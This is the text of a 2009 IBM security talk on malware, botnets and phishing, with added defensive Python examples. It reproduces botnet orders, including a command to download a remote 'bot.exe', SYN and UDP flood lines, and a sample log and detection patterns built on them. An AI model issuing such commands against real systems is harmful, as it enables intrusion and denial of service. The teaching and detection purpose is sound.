ISS X-Force – Professional Security Services
British Computing Society - October 22nd 2009
©2009 IBM Corporation

Malware: Just How Safe Are You!
– Martin Overton
– Malware/Anti-Malware SME

Agenda
• The Problem
  – Malware, what it is and how it works
  – Identity Theft, Bots, Extortion & Mules
• What can I do about it?
• Conclusions
• Questions

Disclaimer
• Products named in this presentation are used as examples only, and should not be taken as any form of endorsement by IBM.
• All trademarks and copyrights are acknowledged.

The Battlefield
• Your Computer
    • Computers are really, really complex.
    • We don't have the foggiest idea what our computers are doing.
    • So many targets, so little time.
• Your Brain
    • The weakest link in most security is the human being behind the keyboard.

The Problem… Malware

Definitions:-
• Virus: "A computer program that can infect other computer programs or [system areas] by modifying them to include a copy (possibly modified) of itself." - Dr. Frederick Cohen, Computer Virus Theory & Experiments.
• Trojan: "A Trojan Horse is a program that does something that its programmer intended but the user is not expecting." "Viruses must replicate to be classed as viruses and Trojans don't replicate."
• Worm: "A worm is a program that makes copies of itself. It may do damage and compromise the security of the computer, but it doesn't replicate by changing a host's code or files." - "Viruses infect, worms infest"
• Malware*: "Code that causes unwanted effects: such as viruses, Trojans (including Remote Access Trojans (RATs)), worms and the side-effects thereof."
*Malicious Software
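Cohen's definition turns on modification of a host: an infector changes an existing program, whereas a worm drops a fresh, self-contained copy. The simplest control that tells the two apart is a file-integrity baseline (the "Integrity Management" layer mentioned later in this deck). The following is an added example, not code from the original presentation; the directory contents, file names and the appended "virus body" in demo() are constructed for the demonstration.

```python
"""File-integrity baseline: catch in-place modification (the file-infector
pattern) and new executables (the worm/dropper pattern).

Added example, not from the original presentation. The files created in
demo() are constructed test data."""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large binaries do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def baseline(root: Path) -> dict[str, str]:
    """Map of relative path -> SHA-256 for every regular file under root."""
    return {
        str(p.relative_to(root)): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(old: dict[str, str], new: dict[str, str]) -> dict[str, list[str]]:
    """Classify differences between two baselines.

    'modified' is the infector signature (an existing program changed),
    'added' is the worm/dropper signature (a new file appeared),
    'removed' covers deletion payloads."""
    return {
        "modified": sorted(k for k in old if k in new and old[k] != new[k]),
        "added": sorted(k for k in new if k not in old),
        "removed": sorted(k for k in old if k not in new),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: take a baseline, then simulate an infector appending
    itself to a host program and a worm dropping a copy of itself."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "notepad.exe").write_bytes(b"MZ" + b"\x00" * 64)  # constructed host
        (root / "readme.txt").write_bytes(b"hello")
        before = baseline(root)

        # File infector: modifies an existing host to carry a copy of itself.
        with (root / "notepad.exe").open("ab") as handle:
            handle.write(b"<virus body>")
        # Worm/dropper: writes a fresh copy; no host file is changed.
        (root / "msupdate.exe").write_bytes(b"MZ<worm body>")

        return compare(before, baseline(root))


if __name__ == "__main__":
    print(demo())
```

The baseline has to be stored somewhere the malware cannot rewrite (read-only media or a remote host); a baseline kept on the same disk is only as trustworthy as the machine it sits on.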

Definition:- Virus
"Viruses are an 'Urban Myth', just like the alligators that live in the New York sewers." - Peter Norton, 1988

More Definitions:
• Backdoor aka RAT:- "A program that is installed on a victim's PC to allow remote access and full control of the victim's PC. They are classified as a sub-class of Trojans as they are frequently installed without the knowledge of the victim."
  – Think of it as a 'remote control' for the victim's computer!
• Blended threat:- "Malware which uses multiple methods (vectors) and techniques (methodologies/exploits/payloads) to propagate and attack systems and networks. (Also known as Cocktail Malware)"
  – Examples include: CodeRed and family, Nimda, Goner, Gokar, Scalper, Slapper, Klez, Yaha, etc.

[Chart: Known/Predicted Virus Growth - Running Total (by year: actual and predicted). X-axis: Year, 1986 to 2009. Y-axis: Total Number of Viruses (Thousands), 0 to 700.]

[Chart: Known/Predicted Virus Growth (Actual) (by year: actual and predicted). X-axis: Year, 1986 to 2008. Y-axis: Number of new Viruses, 0 to 180,000.]

The Changing Face of the Threat
• It was easy when everything was a virus…
  – File infectors
  – Boot infectors
  – Multipartite (File/Boot)
  – Macro
  – Script
• Now viruses are just one category of Malware…
  – Viruses
  – Worms
  – Trojans
  – Backdoors
  – Bots, Zombies
  – Adware
  – Spyware
  – Blended Threats
  – Applications, Security/Hacking Tools
  – Key loggers
  – Rootkits

Why create malware?
• Old Motivations:
  – Curiosity
  – Malice or revenge
  – Peer recognition
  – Political or other causes
  – Fame or infamy
  – Boredom
  – Anarchy
• Typically written by a teenage male…
• New Motivations:
  – Theft of intellectual property, personal data
  – Extortion / blackmail
  – Use stolen machines to carry out attacks, send spam, etc.
  – Make money, and lots of it…
• Typically written to order by professional programmers for professional criminals…
• In other words it is now all about…

How do they arrive or get on my PC?
• Email (links and attachments)
• Web sites (downloads, or via exploits)
• Instant Messaging (downloads, or via exploits)
• Social Engineering
• Social Networking (Twitter, Facebook, XING, LinkedIn)
• USB devices (including phones and iPods)
• Windows shares, poor passwords, exploits
• Floppy discs and infected files (almost any file type now, including PDFs!)

What do they do on, and to my PC?
• Install themselves
• Often disable security tools in place (anti-malware & personal firewall)
• Invite other malcode in to party on your PC
• Steal data (credit card information, bank details, software keys, etc.)
• Install a backdoor to allow remote access/control
• Look for other systems to infect
• Join a botnet
• Send Spam, participate in a DDoS attack, host Phishing or Malware files or web site, be used to store stolen or illegal material, and so on…
• Delete files, registry keys, format the HD, corrupt files, hold files to ransom…

Latest Stats
• 233% growth in the number of malicious sites in the last six months and a 671% growth during the last year.
• 77% of Web sites with malicious code are legitimate sites that have been compromised.
• 95% of comments to blogs, chat rooms and message boards are spam or malicious.
• 57% of data-stealing attacks are conducted over the Web.
• 85.6% of all unwanted emails in circulation contained links to spam sites and/or malicious Web sites.

Virus Payload Animations

Other Virus Screenshots

Swen

CodeRed Spread

The Slammer Worm
• Exploited a well-known bug for which a patch already existed (a buffer overrun in the SQL Server 2000/MSDE Resolution Service, listening on UDP port 1434; Microsoft bulletin MS02-039, published six months before the worm appeared)
• If a vulnerable box receives a single infected 376-byte packet, it becomes infected
• Once a machine is infected, it uses all available bandwidth to fire out infected packets to random addresses
  – 100 Mb connection = 30,000 infected packets per second
• Most vulnerable machines infected within ten minutes
• Slammer carried no payload
  – Mayhem caused by the traffic levels it generated
    • Brought down ATM machines
    • Grounded airliners
    • Caused power outages (allegedly)
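The "ten minutes" figure follows directly from the scan rate: each infected host fires random-destination packets, every hit on a still-vulnerable address adds another scanner, so the infected population grows logistically. The model below is an added example, not code from the original presentation. It takes the deck's 376-byte packet and 100 Mb link and assumes 42 bytes of Ethernet/IP/UDP framing per packet; the 75,000-host vulnerable population in demo() is an assumption chosen to be of the order reported for Slammer, not a figure from the slides.

```python
"""Expected-value model of a random-scanning worm such as Slammer.

Added example, not code from the original presentation. Framing overhead and
the vulnerable population are assumptions (see comments)."""
from __future__ import annotations

ADDRESS_SPACE = 2 ** 32   # IPv4 addresses a random scanner picks from
PAYLOAD_BYTES = 376       # from the deck: one infected UDP datagram
WIRE_OVERHEAD = 42        # assumption: 14 Ethernet + 20 IPv4 + 8 UDP header bytes


def scans_per_second(link_mbps: float, payload_bytes: int = PAYLOAD_BYTES) -> float:
    """Datagrams per second a host can emit if it saturates its link.
    Reproduces the deck's '100 Mb = ~30,000 packets per second'."""
    bits_per_packet = (payload_bytes + WIRE_OVERHEAD) * 8
    return link_mbps * 1_000_000 / bits_per_packet


def simulate(vulnerable: int, scans: float, initial: int = 1,
             step: float = 1.0, max_seconds: float = 3600.0) -> list[tuple[float, float]]:
    """Discrete-time logistic model of the infected count I(t).

    Every infected host emits `scans` random-destination packets per second.
    A packet infects a host with probability (vulnerable - I) / ADDRESS_SPACE,
    the chance of landing on a still-uninfected vulnerable address. Expected
    values only, so the curve is reproducible; the min() clamp keeps the
    expectation from overshooting the population near saturation."""
    infected = float(initial)
    t = 0.0
    curve = [(t, infected)]
    while infected < vulnerable - 0.5 and t < max_seconds:
        susceptible = vulnerable - infected
        new_infections = infected * scans * step * (susceptible / ADDRESS_SPACE)
        infected = min(float(vulnerable), infected + new_infections)
        t += step
        curve.append((t, infected))
    return curve


def time_to_fraction(curve, vulnerable: int, fraction: float) -> float | None:
    """First time at which at least `fraction` of the population is infected."""
    for t, infected in curve:
        if infected >= fraction * vulnerable:
            return t
    return None


def demo() -> dict[str, float | None]:
    """Constructed scenario: 75,000 vulnerable hosts (assumption), each able to
    saturate a 100 Mb link, one infected host at t = 0."""
    vulnerable = 75_000
    scans = scans_per_second(100)
    curve = simulate(vulnerable, scans)
    return {
        "scans_per_second": scans,
        "t50": time_to_fraction(curve, vulnerable, 0.5),
        "t90": time_to_fraction(curve, vulnerable, 0.9),
    }


if __name__ == "__main__":
    print(demo())
```

The model deliberately ignores the congestion the worm itself causes (which is what actually throttled Slammer), so it is an upper bound on speed; the point it makes is that at these scan rates there is no window in which a human-driven response can act, which is why the patch already being available mattered more than anything done on the day.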

Slammer Spread

Converged Threat – Conficker (aka Downadup)

Linux Viruses
• Fastest growing operating system
  – Linux OS gaining popularity
  – Increased Linux deployment
• Linux virus growth increase
  – 50 known viruses in 2001
  – Over 5,000 current known viruses (source: Trend Micro)
• Protection more complex than WinXX
  – OS kernel level consistency (RTS)
  – AV vendor reluctance to support multiple and easily modified kernels

OSX/Leap-A aka OSX/Oompa-A
• Infects the Mac OS X Operating System.
• The worm makes use of the Spotlight search program, included in OS X, and will run each time the machine boots.
• Uses iChat to send the infected file, latestpics.tgz, to all contacts on the infected user's buddy list.

Instant Messaging & Internet Relay Chat
• Many malware now include IM as an infection vector
• Most use port 80, which makes it next to impossible to restrict unauthorised outbound traffic
• Many bots now spread via IM
• Bypasses Gateway AV
• Vulnerable to hackers
• Weak (or no) encryption
• Mainly rely on Social Engineering

Mobile/Cabir
• This proof-of-concept worm spreads through Bluetooth-enabled devices.
• When it arrives, a series of messages appear. These messages warn the user of the possible malicious nature of the file before it is finally installed.
This worm has its Product ID set to (0x101F6F88), which basically targets Series 60 v0.9. The said setting is the most common and conservative choice for a basic application because it is compatible with all existing Series 60 devices.
Mabir – Cabir with MMS functionality too…
Some Series 60 devices are as follows:
Phones based on Nokia Series 60 Developer Platform 2.0 (Nokia 7610, Nokia 6620, Nokia 6600, Panasonic X700)
Phones based on Nokia Series 60 Developer Platform 1.0 (Nokia 7650, Nokia 3650, 3600, Nokia 3660, 3620, Nokia N-Gage, Siemens SX1, Sendo X)

Duts aka Dust
• This proof-of-concept virus is a parasitic file infector. It is the first known virus for the PocketPC platform. Duts affects ARM-based devices only, and targets Windows CE / PocketPC devices.
• Duts contains two messages that are not displayed:
"This is proof of concept code. Also, i wanted to make avers happy. The situation when Pocket PC antiviruses detect only EICAR file had to end ..."
• The other one is a reference to the science-fiction book Permutation City by Greg Egan, where the virus got its intended name from: "This code arose from the dust of Permutation City"

More Definitions:
• Spyware:- the generic name for any application that may track your online and/or offline PC activity and is capable of locally saving or transmitting those findings to third parties, sometimes with but more often without your knowledge or consent.
  – Spyware comes in many forms including adware, key loggers, Trojans, browser hijackers, and diallers.
• Keylogger:- a type of system monitor that has the ability to record all keystrokes on your computer. Therefore, a keylogger can record and log your e-mail conversations, chat room conversations, instant messages, and any other typed material. They have the ability to run in the background, hiding their presence.

Spyware - Key Logger - Example
What a great program!
This was just an outstanding program. I've had no problems with it running, and had no problems installing it. This program ran in the background under stealth mode and let me catch my cheating husband in the act of sending emails and instant messages to his mistress. He never even suspected the program was on the computer.
I highly recommend this program if, like me, you are looking to catch a two-timing rat. We are now divorced, and needless to say, the program has paid for itself many, many times over.

Malware extortion

Definitions:-
• Bot
    • 'Bot' is a contracted (truncated or short) name for a software robot. A bot is a piece of software that allows a system to be remotely controlled without the owner's knowledge; it can also be used to automate common tasks, such as on IRC. Also known as a drone or zombie.
• Botnet
    • A group ['Herd' or 'Network'] of Zombie systems controlled by the 'Bot Herder'. These botnets are told what to do by the botnet owner. This can be anything that the bot has been programmed to do... including updating itself or installing new malicious software.
• Bot Herder
    • The person [or group] which "owns" and controls a herd of bots. Also known as the Bot Master aka Zombie Master.

Definitions:-
• DDoS [aka Distributed Denial of Service]
  – A distributed denial-of-service attack is an attack on a computer system or network from multiple co-ordinated systems connected to the same network which are performing a denial of service attack.
• IRC – "Internet Relay Chat (IRC) is a form of instant communication over the Internet. It is mainly designed for group (many-to-many) communication in discussion forums called channels, but also allows one-to-one communication."

Infection/Propagation Methods
• Vulnerabilities, e.g. RPC, DCOM, LSASS, MSSQL
• Dictionary attack, Open Windows Shares [SMB]
• E-mail, e.g. Mytob, Bagle, Mitglieder, etc.
• Existing Backdoor, e.g. Bagle, Mydoom, etc.
• Download from website via dropper [e-mail or Instant Messaging]
• Peer 2 Peer File Sharing
Update Methods
• Update or install new components from website or ftp server

Example 'botnet' commands
[Diagram: Bot Herder → IRC Server → bots; a DNS Server resolves the C&C host name.]
Report for Duty: Once infected the bot signs in to the IRC server's dedicated 'bot' channel for instructions.
Send Orders: All bots connected to the IRC server's dedicated 'bot' channel receive and carry out the instructions.
• Scan for more victims to press-gang into service:
    Advscan lsass 200 5 0 -b
• Update the 'bot' software:
    http.update http://badserver/bot.exe c:\msupdate.exe 1
• Attack!
    Ddos.syn xxx.xxx.xxx.xxx 80 900
    Udp xxx.xxx.xxx.xxx 20000 100000 10
• Spam, Spam, Spam…
    Spam.setlist
    Spam.settemplate
    Spam.start
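Because the orders travel over plain IRC, the same channel traffic that drives the bots is visible to an IDS on the wire. The following is an added example, not code from the original presentation or any product it names: it parses IRC PRIVMSG lines and flags the four command families shown above (scan, update, DDoS, spam). The log lines in SAMPLE_LOG are constructed; the host names and the 203.0.113.x address are documentation placeholders standing in for the xxx.xxx.xxx.xxx on the slide.

```python
"""Flag IRC traffic that matches the bot command-and-control pattern above.

Added example, not from the original presentation. SAMPLE_LOG is constructed;
the command syntax mirrors the deck's examples (advscan, http.update,
ddos.syn, udp, spam.*)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# RFC 1459 message shape: ":nick!user@host PRIVMSG #channel :text"
PRIVMSG = re.compile(r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# Command families. Patterns are anchored at the start of the message text and
# tolerate an optional leading '.', which many bots use as a command prefix.
BOT_COMMANDS = [
    ("scan",   re.compile(r"^\.?advscan\s+\w+\s+\d+\s+\d+\s+\d+", re.I)),
    ("update", re.compile(r"^\.?http\.update\s+https?://\S+\s+\S+", re.I)),
    ("ddos",   re.compile(r"^\.?ddos\.\w+\s+" + IPV4 + r"\s+\d+\s+\d+", re.I)),
    ("ddos",   re.compile(r"^\.?udp\s+" + IPV4 + r"\s+\d+\s+\d+", re.I)),
    ("spam",   re.compile(r"^\.?spam\.(?:setlist|settemplate|start)\b", re.I)),
]


@dataclass
class Alert:
    sender: str
    channel: str
    family: str
    text: str


def classify(text: str) -> str | None:
    """Return the command family for one message, or None if it looks benign."""
    for family, pattern in BOT_COMMANDS:
        if pattern.match(text.strip()):
            return family
    return None


def scan_log(lines) -> list[Alert]:
    """Run every PRIVMSG through classify() and collect the hits."""
    alerts: list[Alert] = []
    for line in lines:
        match = PRIVMSG.match(line.strip())
        if not match:
            continue  # PING/PONG, JOIN, numerics: not command traffic
        family = classify(match["text"])
        if family:
            alerts.append(Alert(match["prefix"] or "?", match["target"], family, match["text"]))
    return alerts


# Constructed sample: one herder issuing the deck's four command types, plus
# ordinary chat and a server PING that must not trigger.
SAMPLE_LOG = [
    ":herder!h@c2.example PRIVMSG #bots :.advscan lsass 200 5 0 -b",
    ":herder!h@c2.example PRIVMSG #bots :.http.update http://badserver.example/bot.exe c:\\msupdate.exe 1",
    ":herder!h@c2.example PRIVMSG #bots :.ddos.syn 203.0.113.5 80 900",
    ":herder!h@c2.example PRIVMSG #bots :.udp 203.0.113.5 20000 100000 10",
    ":herder!h@c2.example PRIVMSG #bots :.spam.setlist",
    ":herder!h@c2.example PRIVMSG #bots :.spam.start",
    ":alice!a@home.example PRIVMSG #linux :anyone tried the new kernel yet?",
    "PING :irc.example",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert.family:6} {alert.sender} -> {alert.channel}: {alert.text}")
```

Matching on the command grammar rather than on the C&C host name is what keeps the rule useful after the herder moves servers; the obvious evasion (a different command vocabulary per bot family, or an encrypted channel) is why the deck lists custom IDS signatures alongside, not instead of, host-based controls.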

[Diagram: Bot Herder → DNS Server / IRC Server → Botnet; the botnet is fed by Malware or Dropper and targets a "Scan and 'Sploit" Victim, a DDoS Victim and a "Spam, 419, or Phishing" Victim.]

Size of the Problem
• The Honeynet project paper entitled "Know your Enemy: Tracking Botnets":
    • Logged 226,585 unique IP addresses logging into one of the IRC botnet C&C channels.
    • Botnets ranged in size from several hundred 'zombies' to more than 50,000 'zombies'.
    • They observed 226 DDoS attacks against 99 unique targets.
    • Typical size of a botnet: 2000+ bots ['zombies'].
    • From this data they worked out that the number of bots required to successfully DDoS a typical company was just 13. This assumes that the company is on a T1 [1.544 Mbit] and that each 'zombie' has a 128 Kbit link [128 Kbit x 13 = 1.664 Mbit].

Definition:- Phishing
• The art of using social engineering to encourage the user to divulge information
• The user receives an email directing them to a website which looks official, but isn't!
• The user is encouraged to enter account details, passwords etc.
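The "looks official, but isn't" trick is usually carried by the link itself: the visible text names the real bank, the href points somewhere else. A mail gateway can catch the crude versions mechanically. The following is an added example, not code from the original presentation: it extracts every link from an HTML body and flags destinations that are raw IP addresses, are not under the expected domain, or disagree with what the link text claims. SAMPLE_EMAIL is a constructed message, "examplebank.com" is the assumed legitimate domain, and 203.0.113.9 is a documentation-range address.

```python
"""Heuristic check for decoy links in a phishing email.

Added example, not from the original presentation. SAMPLE_EMAIL and the
domain examplebank.com are constructed for the demonstration."""
from __future__ import annotations

import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.links: list[tuple[str, str]] = []
        self._href: str | None = None
        self._text: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    """Lower-cased host name of a URL; a bare 'www.x.com/path' is accepted too."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_links(html: str, expected_domain: str) -> list[tuple[str, list[str]]]:
    """Return (href, reasons) for each link that does not belong to expected_domain."""
    collector = _LinkCollector()
    collector.feed(html)
    findings: list[tuple[str, list[str]]] = []
    for href, text in collector.links:
        host = host_of(href)
        reasons: list[str] = []
        if is_ip_literal(host):
            reasons.append("destination is a raw IP address")
        if host != expected_domain and not host.endswith("." + expected_domain):
            reasons.append(f"destination host {host!r} is not under {expected_domain}")
        # If the visible text itself looks like a URL or host name, compare it
        # with the real destination: a mismatch is the classic decoy link.
        shown = host_of(text) if ("." in text and " " not in text) else ""
        if shown and shown != host:
            reasons.append(f"visible text claims {shown!r}")
        if reasons:
            findings.append((href, reasons))
    return findings


# Constructed sample: two decoy links and one genuine one.
SAMPLE_EMAIL = """
<p>Dear customer, please verify your account within 24 hours:</p>
<a href="http://203.0.113.9/verify">www.examplebank.com/verify</a><br>
<a href="http://examplebank.com.secure-login.example/">https://www.examplebank.com</a><br>
<a href="https://www.examplebank.com/help">Help centre</a>
"""

if __name__ == "__main__":
    for href, reasons in suspicious_links(SAMPLE_EMAIL, "examplebank.com"):
        print(href, "->", "; ".join(reasons))
```

The second sample link shows why the check must compare against the registered domain rather than search for the brand name anywhere in the host: "examplebank.com.secure-login.example" contains the bank's name and still belongs to the attacker. What this check cannot catch is a link to a legitimate site that has itself been compromised, which the deck's own statistics say is the majority case.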

The Darker Side Of Phishing
• Recently phishing scams have moved on from simply stealing your bank details to installing malware on your PC!

Mules
• Why store things on my computer, when I can store them on yours?
  – Broadband makes this feasible
  – Easy to do with a Trojan

Identity and IP Theft
• Identity is easy to steal
  – Given access to a machine
  – All your life is there!
  – Very hard to recover from
• Theft of corporate data [Intellectual Property]
  – Sold to your competitors
  – Beat you to the sale
  – Copy/Steal your product designs, etc.
• Tools – Trojan, spyware, keylogger, bot

Attack Sophistication Increases While Intruder Sophistication Decreases
• Meta-Events help identify multi-event tool based attacks
[Chart: Attack Sophistication rising from LOW to HIGH over time while Intruder Sophistication falls from HIGH to LOW.]

Threat Convergence Replacing Threat Evolution
• Threat Evolution:
  – A flat world has brought about an unprecedented number of criminals and cons
  – Attackers keep ROI in mind as well, and constantly evolve their wares in order to re-purpose them for the next flood of attacks
  – High profile vulnerabilities will still be the vehicles for new attacks; however, the low and slow attack vectors cannot be ignored
  – The economics of exploitation must be taken into consideration to better prioritise risk

What can I do about it?

Anti-Malware Strategy
• Malware/Spyware/Rootkit Scanners are ONLY as good as their LAST UPDATE.
• No 100% solution
    • "Anyone who tells you that their product offers 100% protection from viruses is either naïve or just doesn't fully understand the real problem."
• The best you can expect is 98%, but only if you design and implement your approach properly.
• Implement a multi-layered defence!

Multi-layered Anti-Malware - What's That?
• Like an Onion…
  – E-Mail was responsible for at least 80% of all malware outbreaks.
  – Web filtering/scanning can block many attacks.
  – Updating a few perimeter machines can stop new malware from gaining a beach head.
[Diagram: layers from the outside in - Firewall/Proxy Server; Web Scanning/Mail Scanning; File/Print Servers; Personal Computers.]

Solutions – Tools and Technologies
• Anti-Virus
  – Too many to list
• Anti-Rootkit Tools
  – ChkRootkit [*NIX - http://chkrootkit.org/]
  – Rootkit Hunter [*NIX - http://www.rootkit.nl/projects/rootkit_hunter.html]
  – RootkitRevealer [Wintel - http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml]
  – UnHackMe [Wintel - http://greatis.com/unhackme/]
  – Blacklight [Wintel - http://www.f-secure.com/blacklight/]
• Personal Firewalls
  – Too many to list
  – Can block internet access to untrusted executables – assuming the malware hasn't already disabled it!

Solutions – Tools and Technologies - Other
• Honeypots and Honeynets
• IDS and IPS
• Perimeter firewalls
• Partitioning your network with router ACLs and internal firewalls
• Patch management
• Strong passwords
"In other words, stop them getting onto your systems in the first place, and if they do get in, slow them down, or increase your ability for early detection."

Applying a Multi-layered Anti-Malware
[Diagram: the layers Personal Computers, Firewall/Proxy Server, Web Scanning/Mail Scanning and File/Print Servers, with the following controls placed across them:]
• AV Vendor 1, AV Vendor 2, AV Vendor 3
• IDS, Personal IDS
• Content Filtering/Generic Blocking/Filtering
• Kernel Wrappers (Entercept)
• Intrusion Prevention Systems (IntruShield)
• Personal Firewalls
• Behaviour Blockers/Sandbox
• Integrity Management
• PacketShapers (QoS/Packeteer), NetFlow (Cisco), Layer 7 Switches
• Centralised remote patching of all systems
• Backups
• SMB-Lures, Tarpits, Honeypots, Honeynets, BillyGoats
• Policies and Procedures
• Managed Service

Putting it all together…
• Malware Sensors
  – SMB-Lures, Tarpits, Honeypots, Honeynets, BillyGoats
• Multiple Antivirus Vendors
  – Workstation
  – Servers
  – Perimeter (Web, FTP and SMTP)
• IDS
  – Using custom malware rules/signatures
• Automated Patching
  – Centralised remote patching of all systems via Tivoli, SMS, etc.
• Management
  – Centralised, Geo-centric, or at least country-centric
  – Policies (What we want to achieve)
  – Procedures (How we are going to achieve it)
  – People (Who's going to do it)
  – Products (The technology bit)
• Others
  – Kernel Wrappers (Entercept)
  – Personal Firewalls (McAfee/ZoneLabs)
  – Personal IDS (BlackICE)
  – Generic Blocking/Filtering
  – Heuristics
  – Backups
  – Intrusion Prevention Systems (IntruShield)
  – Behaviour Blockers/Sandbox Technology (Finjan SurfinShield)
  – Firewalls/Proxies
  – PacketShapers (QoS/Packeteer)
  – NetFlow (Cisco)
  – Layer 7 Switches
  – Managed e-mail virus scanning, anti-spam service

The Best Defence – End User
• Regularly run a malware scan
  – Keep your anti-malware product up-to-date
• Install firewall code, anti-spyware and anti-rootkit tools
• Don't run Peer to Peer software
• Keep up to date with security patches
• Learn a bit more about your computer
  – Never, ever run anything you've downloaded or received unless you're pretty confident of its source
  – Download some tools
  – Think!

Conclusions…
• Malware is here to stay.
• The problem is going to get worse.
    • 4,000-7,000+ new malware every month. January 2008 was over 13,000!
    • More Worms, Bots, Trojans and 'Blended Threats' appearing.
    • Becoming more stealthy and relying more on Social engineering.
    • For profit, no longer for fun…
• More than 600,000 viruses by the end of 2009?
• No matter what tricks the malware writers use, the AV industry will neutralise it.
  – Eventually!
• AV is only one small but important part of an overall anti-malware solution.
• Technology is a small part of an overall solution; user behaviour and proper security controls must be addressed.

Not all computer problems are caused by malware…

Questions?

Contact details…
Martin Overton
EMEA Malware/Anti-Malware SME
IBM ISS X-Force – PSS
• E-Mail: overtonm@uk.ibm.com
• Telephone: +44 (0)23 9256 3442
• Mobile: +44 (0)7764 666939

Useful sites
• Anti-Virus (On-line scanners)
  – http://housecall.trendmicro.com/
  – http://us.mcafee.com/root/mfs/default.asp
• Links to FREE AV, Personal Firewalls and Anti-Spyware tools
  – http://momusings.co.uk/software.aspx
• Recommended Books
  – Viruses Revealed (Harley, Slade, Gattiker) – ISBN 0-07-213090-3
  – Hacking Exposed (Scambray, McClure, Kurtz) – ISBN 0-07-212748-1
• Site related to 'spoof' or 'rogue' anti-spyware tools
  – http://www.spywarewarrior.com/rogue_anti-spyware.htm

Useful sites… cont.
• Hoax, Scam, Urban Legend Reference Sites
  – http://cluestick.me.uk
  – http://snopes.com
• Papers and articles I've written
  – http://momusings.com/papers
• My Personal 'Blog'
  – http://momusings.com/momusings
  – http://momusings.com/vsub

Background
• Sun Alliance / Royal and Sun Alliance
  – Joined 1988
  – Commissioning PCs, Strategy (hardware and software)
  – Responsible for Malware Research/Prevention (10 years)
  – Ethical Hacker (2.5 years)
  – Helped set up Independent ISS UK User Group
  – WildList reporter, Charter member of AVIEN
• Outsourced April 2002
  – Joined EMEA IGS Security June 2002 as Malware/Anti-Malware SME
  – Moved to MSSD (EMEA) June 2004 to set up EMEA Virus CERT
  – Member of Global Virus CERT
  – Lead Computer Forensics Analyst for EMEA
  – Moved to ISS X-Force Professional Security Services April 2008
• 21 Years of knowledge on malware and related security threats.
Recommended